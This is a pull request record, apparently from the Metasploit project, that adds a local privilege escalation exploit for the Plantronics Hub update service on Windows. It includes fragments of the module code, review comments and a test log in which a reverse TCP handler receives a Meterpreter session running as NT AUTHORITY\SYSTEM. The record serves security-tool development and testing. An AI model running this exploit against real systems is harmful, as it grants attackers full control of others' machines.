### PR TITLE
Add Plantronics Hub SpokesUpdateService Privilege Escalation

### LINKED ISSUE #12781: Add Plantronics Hub 3.13.2 - Local Privilege Escalation
https://www.exploit-db.com/exploits/47845

Plantronics Hub

### PR DESCRIPTION
**Pull request by bcoles**
Add Plantronics Hub SpokesUpdateService Privilege Escalation module.

        The Plantronics Hub client application for Windows makes use of an
        automatic update service `SpokesUpdateService.exe` which automatically
        executes a file specified in the `MajorUpgrade.config` configuration
        file as SYSTEM. The configuration file is writable by all users by default.

        This module has been tested successfully on Plantronics Hub version 3.13.2
        on Windows 7 SP1 (x64).

Resolves #12781

### CODE REVIEW

File: modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb [hunk 1]
```diff
@@ -0,0 +1,114 @@
...
+  end
+
+  def check
+    service = 'PlantronicsUpdateService'
+
+    unless service_exists? service
+      return CheckCode::Safe("#{service} does not exist")
+    end
+
+    path = "C:\\ProgramData\\Plantronics\\Spokes3G"
```
Comment (smcintyre-r7) [inline modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb]: These references to `C:\\ProgramData` should probably be using `%PROGRAMDATA%`.

File: modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb [hunk 2]
```diff
@@ -0,0 +1,114 @@
...
+    CheckCode::Detected
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    if is_system?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
```
Comment (smcintyre-r7) [inline modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb]: Not really running as "root" in this context.

**Review by smcintyre-r7 — DISMISSED** [review]

File: modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb (hunk 2 above)
Comment (bcoles) [reply modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb]: Fixed

**Comment by smcintyre-r7** [comment]
Just tested this and it's working as intended on Windows 10 x64.
```
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > check
[*] The service is running, but could not be validated.
msf5 exploit(windows/local/plantronics_hub_spokesupdateservice_privesc) > exploit

[*] Started reverse TCP handler on 192.168.44.128:4444 
[*] Sending stage (180291 bytes) to 192.168.44.130
[*] Meterpreter session 2 opened (192.168.44.128:4444 -> 192.168.44.130:53873) at 2020-01-15 10:35:43 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

**Review by smcintyre-r7 — APPROVED** [review]

**Comment by smcintyre-r7** [comment]
Merged, thanks @bcoles!

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds a module for exploiting a local privilege escalation vulnerability within the Plantronics Hub software. This vulnerability, identified as 2019-15742, has been tested on Windows 7 x64 and Windows 10 x64 where it will yield a session as NT AUTHORITY\SYSTEM.

**Pull request merged**